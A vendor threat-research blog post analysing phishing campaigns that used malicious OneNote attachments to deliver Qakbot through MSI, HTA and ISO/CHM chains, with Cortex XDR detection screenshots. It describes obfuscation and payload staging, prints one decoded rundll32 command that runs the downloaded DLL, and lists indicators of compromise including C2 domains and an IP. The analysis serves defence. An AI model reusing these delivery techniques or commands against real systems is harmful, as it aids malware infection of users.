* [Blog](https://origin-researchcenter.paloaltonetworks.com/blog) * [Security Operations](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/) * [Must-Read Articles](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/category/must-read-articles/) * The Adventures of Malicio... # The Adventures of Malicious OneNote Attachments in Cortex XDR Land [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthe-adventures-of-malicious-onenote-attachments-in-cortex-xdr-land%2F) [](https://twitter.com/share?text=The+Adventures+of+Malicious+OneNote+Attachments+in+Cortex+XDR+Land&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthe-adventures-of-malicious-onenote-attachments-in-cortex-xdr-land%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthe-adventures-of-malicious-onenote-attachments-in-cortex-xdr-land%2F&title=The+Adventures+of+Malicious+OneNote+Attachments+in+Cortex+XDR+Land&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/the-adventures-of-malicious-onenote-attachments-in-cortex-xdr-land/&ts=markdown) \[\](mailto:?subject=The Adventures of Malicious OneNote Attachments in Cortex XDR Land) Link copied By [Daniel Frank](https://www.paloaltonetworks.com/blog/author/daniel-frank/?ts=markdown "Posts by Daniel Frank") Jul 05, 2023 10 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [chm](https://www.paloaltonetworks.com/blog/tag/chm/?ts=markdown) [Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown) [hta](https://www.paloaltonetworks.com/blog/tag/hta/?ts=markdown) [iso](https://www.paloaltonetworks.com/blog/tag/iso/?ts=markdown) [msi](https://www.paloaltonetworks.com/blog/tag/msi/?ts=markdown) [onenote](https://www.paloaltonetworks.com/blog/tag/onenote/?ts=markdown) [qakbot](https://www.paloaltonetworks.com/blog/tag/qakbot/?ts=markdown) [wscript](https://www.paloaltonetworks.com/blog/tag/wscript/?ts=markdown) [XDR](https://www.paloaltonetworks.com/blog/tag/xdr/?ts=markdown) ## Executive Summary The Cortex Threat Research team has been tracking recent campaigns that were using malicious OneNote email attachments as the initial attack vector. Malicious OneNote files have been made popular by various threat actors earlier this year, as a response to [Microsoft blocking internet macros](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) by default. In correlation with Microsoft's notice, starting in early 2023, OneNote infected attachments have been seen spreading malware such as [Emotet](https://www.bleepingcomputer.com/news/security/emotet-malware-now-distributed-in-microsoft-onenote-files-to-evade-defenses/), [Qakbot](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rising-trend-of-onenote-documents-for-malware-delivery/), and [AsyncRAT](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/) to name a few. Similar to attacks delivering malicious Word macro attachments, various themed emails were seen sent at scale, luring potential victims into downloading an attached malicious OneNote file. OneNote itself is installed by default as part of various versions of Microsoft Office installations, and allows embedding of macros. Microsoft released [another notice](https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block) in April, stating that 120 extensions will be blocked by default in OneNote, disabling the user's interaction with a OneNote file completely. These changes began rolling out with OneNote Version 2304 in April 2023, but for all users who have not yet updated, this attack vector is prevalent. We observed multiple malware delivery methods techniques in the different campaigns, using various script types that serve as loaders, such as [CScript](https://lolbas-project.github.io/lolbas/Binaries/Cscript/), [WScript](https://lolbas-project.github.io/lolbas/Binaries/Wscript/), as well as running [MSHTA](https://lolbas-project.github.io/lolbas/Binaries/Mshta/) files. This writeup will examine some of the more salient techniques and provide insights on how Cortex XDR detects and blocks the infection chains derived from each file. ## Initial Access and Structure The initial access vector of OneNote malicious attachments consists of the "good old" method of luring the victim into opening an email containing a malicious attachment. In the example below, we can see a targeted fake reply to a correspondence that is pretending to be of an urgent matter, in order to pressure the victim into opening the attached file. This email was part of a larger phishing campaign that targeted Italian-speaking users. ![Figure 1. An email containing a malicious OneNote attachment](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-1.png) Figure 1. An email containing a malicious OneNote attachment These malicious documents often feature intentionally blurred content, accompanied by a message that prompts the users to press a button with the promise of unblurring the content. Pressing on the said button enables the running of the malicious macro and ultimately triggers the infection chain. The screenshot below depicts a malicious document that is pretending to be protected by a "security signature" of Microsoft Azure Cloud. ![Figure 2. The content of the aforementioned OneNote malicious attachment](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-2.png) Figure 2. The content of the aforementioned OneNote malicious attachment Extracting the MSI package's content shows that these are all in fact just images, including the blurred "document" in the background. It is also interesting to note that the default names of the extracted image resources are in Russian and simply mean "unnamed painting". ![Figure 3. The images resources extracted from the OneNote file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-3.png) Figure 3. The images resources extracted from the OneNote file Another example shows a decoy email in German. This shows how widespread these attacks are, focusing on multiple potential victims and countries. ![Figure 4. Content of the lure email](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-4.png) Figure 4. Content of the lure email After opening the attached document, a window using the Office 365 theme appears, prompting the user to download a document allegedly hosted on the cloud. ![Figure 5. Another example of a malicious document content](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-5.png) Figure 5. Another example of a malicious document content The content of this document carries a malicious HTA file. After the user clicks on the "Open" button, they unknowingly execute the HTA file, and the JavaScript embedded in this file creates a fake popup message. The fake popup is used to divert the users' attention from the fact that a malicious script is running in the background. ![Figure 6. The fake message displayed while malicious code is running in the background](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-6.png) Figure 6. The fake message displayed while malicious code is running in the background ### MSI Installer Variant Once a user is successfully lured into clicking the aforementioned button, an MSI file is launched, including a malicious Windows script file that is actually bundled in it. Upon the installation of the MSI file the Windows script file is written to disk and then executed by the WScript engine. Using the [UniExtract2](https://github.com/Bioruebe/UniExtract2) tool, it is possible to reveal the aforementioned Windows script file that is bundled in the installation package. ![Figure 7. Contents of the MSI installer](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-7.png) Figure 7. Contents of the MSI installer The extracted script file is obfuscated and contains junk code. Parts of the script are also scattered in between benign text, such as excerpts from "Alice in Wonderland", for example. ![Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-8.png) Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland By breaking the script into pieces and embedding them in large benign text files, the attackers attempt to thwart analysis efforts and evade detection by AV solutions. Two scripts are eventually dropped on disk, in the %programdata% folder, by the Windows script. ![Figure 9. Names of the two script files that are being dropped on disk](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-9.png) Figure 9. Names of the two script files that are being dropped on disk The scripts are executed in the background while the victim thinks they are installing Azure cloud software. ![Figure 10. content of the two script files dropped on disk](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-10.png) Figure 10. content of the two script files dropped on disk The content of these two additional scripts, prior to being written to disk, is embedded in a hex-encoded form in the Windows script file. There are two strings which are especially noticeable. Decoding the first hex encoded string reveals the code below. This code downloads a file from a remote command and control server (C2) and saves it to disk. ![Figure 11. Content of the first decoded hex string](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-11.png) Figure 11. Content of the first decoded hex string Decoding the second hex string reveals another piece of code, responsible for executing the previously downloaded file with the right exports method, "Motd", using the Windows built-in Rundll32 binary. This is indicative that the dropped file is actually a DLL file, rather than a .tmp file as the name would suggest. ![Figure 12. Content of the second decoded hex string](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-12.png) Figure 12. Content of the second decoded hex string The final payload is the well established [Qakbot](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot) malware, an information stealer, and formally a banking Trojan, that has been around since at least 2007. The execution of the MSI installer was detected and prevented by Cortex XDR, as seen in the screenshots below. ![Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-13.png) Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode ![Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-14.png) Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode ### HTA File Variant We observed another infection method using OneNote in a campaign that targeted German-speaking users. In this campaign, instead of an MSI installer, the attackers used an [HTML Application](https://en.wikipedia.org/wiki/HTML_Application) (HTA) file. The HTA file's content is much shorter than the previous MSI variant's Windows script, but it still contains some obfuscated strings. The string in its obfuscated form is depicted below. ![Figure 15. Obfuscated content of the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-15.png) Figure 15. Obfuscated content of the HTA file Deobfuscating this string returns the following script, which reveals the main malicious functionality. ![Figure 16. Deobfuscated content of the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-16.png) Figure 16. Deobfuscated content of the HTA file This part of the script shows the usage of the curl utility in order to download a payload to the disk, masquerading it as a PNG file. The script then proceeds to display the fake pop up message that the document is corrupted, as depicted in the "Initial Access" section. After the deobfuscation, the script content is written to the registry, under the key HKCU\\\\SOFTWARE\\\\rq5w\\\\xczis\\\\x4dyhu. Finally, the freshly written key is being read from the registry, and if it exists then the part of the script below provides the url parameter to the curl utility to download the malicious payload. The registry value is then deleted. ![Figure 17. The C2 URL as seen in the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-17.png) Figure 17. The C2 URL as seen in the HTA file Cortex XDR detected and prevented the execution of the mshta.exe file, as seen in the screenshots below. ![Figure 18. The HTA file execution as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-18.png) Figure 18. The HTA file execution as seen in Cortex XDR in detect mode ![Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-19.png) Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode ### ISO + CHM Variant We observed a third infection scenario that is an interesting combination of a bundled ISO image containing a [CHM file](https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help). The theme of the document resembles the examples above. When the user clicks on the "Open" button, the ISO image that contains the CHM file is mounted. ![Figure 20. The ISO image that is mounted on the user’s PC](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-20.png) Figure 20. The ISO image that is mounted on the user's PC After extracting the ISO file and the contents of the CHM file, we see the CHM file contains an additional command line that to be executed on click. ![Figure 21. Content of the CHM file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-21.png) Figure 21. Content of the CHM file The Base64 encoded command line translates to the code that can be seen in figure 16. The encoded PowerShell command is in Base64 and decodes to start rundll32 $env:TEMP\\PebbliestUndetractive.capriote, Motd;. This time the attackers embedded an array of C2 servers, running in a loop, waiting for a successful connection in order to download and execute the Qakbot payload. ![Figure 22. Base64 decoded PowerShell command](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-22.png) Figure 22. Base64 decoded PowerShell command Cortex XDR detected and prevented the execution of the CHM file, as seen in the screenshots below. ![Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-23.png) Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode ![Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-24.png) Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode ### Protections and Mitigations Cortex XDR customers are protected against different variations of infection chains using malicious OneNote attachments. The different scenarios described in detail above and their infection chains are detected and blocked by the Cortex XDR platform and can be seen in each scenario above and the respective detection and prevention screenshots. In addition to the classic detection, the unique [SmartScore](https://www.paloaltonetworks.com/blog/security-operations/beating-alert-fatigue-with-cortex-xdr-smartscore-technology/) engine translates security investigation methods and their associated data into a ML-driven hybrid risk scoring system. All three scenarios detailed in this blog scored higher than 95 out of 100 by SmartScore. ![Figure 25. SmartScore results for the MSI installer variant incident](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-25.png) Figure 25. SmartScore results for the MSI installer variant incident ## Indicators of Compromise ### MSI Installer Variant ### Email a6f3ce007be6810ef4df88e97aca226666c904065f1a1215079be4570b941227 ### OneNote Attachment 66a8e8fd9f50632b86408434cad6cf7238f243f2bca7f601dc108a933174c017 ### C2 Domain logswalker\[.\]com ### MSI Installer 1ce9f46beb6336aee67c548ce11aed6a80ec6816d89a35ed0ca6def577932198 ### Windows Script 3c9aa9fc46d14bcd25da2bcae0a924b0840c6b067c889ba242f0840a9e72fbd3 ## HTA File Variant ### Email 9210833cd360ba3af63f7108cfc406308c04b85bef5f35e4660e687c1c8db45d ### OneNote Attachment ccea71c3007664a78b34ee6ffd5237b7d3a24f6957a59f654154244160f44c53 ### HTA File 51b74094e47e5e4b8387a47924576872170ba7b0b0618f6ea0b36954ba1a4b0f ### C2 IP 51\.255.141\[.\]79 ## ISO + CHM Variant ### OneNote Document 67febd5039bb69c26e12f3ca6e82b0478b0e98b8965c0a6119763335088b246a ### ISO File 3efd4aac02a180f8d49ec63105802c44a39b5d2a584b35aed43be997e1e0d5d5 ### CHM File 6c5c936c65311794478b2c35ca51aa17473f647b2a88af51dceed5fbe60eece2 ### C2 Domains nayadofoundation\[.\]org mrcrizquna\[.\]com gsscorporationltd\[.\]com zainco\[.\]net erg-eg\[.\]com carladvogadatributaria\[.\]com citytech-solutions\[.\]com hotellosmirtos\[.\]com ## Additional Resources [https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rising-trend-of-onenote-documents-for-malware-delivery/](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rising-trend-of-onenote-documents-for-malware-delivery/) [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-1/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-1/) [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/) *** ** * ** *** ## Related Blogs ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### Prioritizing Impact: A Practical Framework for XDR Success](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/prioritizing-impact-a-practical-framework-for-xdr-success/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### Introducing Malicious LDAP Query Protection for Cortex ITDR](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/introducing-malicious-ldap-query-protection-for-cortex-itdr/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### From Silos to Synergy: How Cortex XDL Transforms XDR to Elevate Threat Detection](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/from-silos-to-synergy-how-cortex-xdl-transforms-xdr-to-elevate-threat-detection/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### SE Labs Awards Palo Alto Networks AAA Rating and 100% Prevention Against Ransomware](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/se-labs-awards-palo-alto-networks-aaa-rating-and-100-prevention-against-ransomware/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### Think You Have Visibility? Think Again.](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/think-you-have-visibility-think-again/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### NL2XQL: Turning Natural Language into Powerful Cybersecurity Querying](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/nl2xql-turning-natural-language-into-powerful-cybersecurity-querying/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://origin-researchcenter.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown) * [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown) * [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown) * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown) * [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown) * [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown) * [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown) * [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown) * [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) * [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown) * [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown) * [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown) * [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown) * [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown) * [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown) * [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown) * [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown) * [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown) * [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown) * [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown) * [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown) * [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown) * [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown) * [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown) * [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown) * [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown) * [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown) * [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown) * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown) * [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown) * [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown) * [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown) * [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown) * [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown) * [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown) * [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown) * [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown) ## Company * [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown) * [Careers](https://jobs.paloaltonetworks.com/en/) * [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown) * [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown) * [Customers](https://www.paloaltonetworks.com/customers?ts=markdown) * [Investor Relations](https://investors.paloaltonetworks.com/) * [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown) * [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown) ## Popular Links * [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown) * [Communities](https://www.paloaltonetworks.com/communities?ts=markdown) * [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown) * [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown) * [Event Center](https://events.paloaltonetworks.com/) * [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center) * [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown) * [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown) * [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown) * [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown) * [Tech Docs](https://docs.paloaltonetworks.com/) * [Unit 42](https://unit42.paloaltonetworks.com/) * [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd) ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg) * [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown) * [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown) * [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) * [Documents](https://www.paloaltonetworks.com/legal?ts=markdown) Copyright © 2026 Palo Alto Networks. All Rights Reserved * [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks) * [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown) * [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/) * [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks) * [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks) * EN Select your language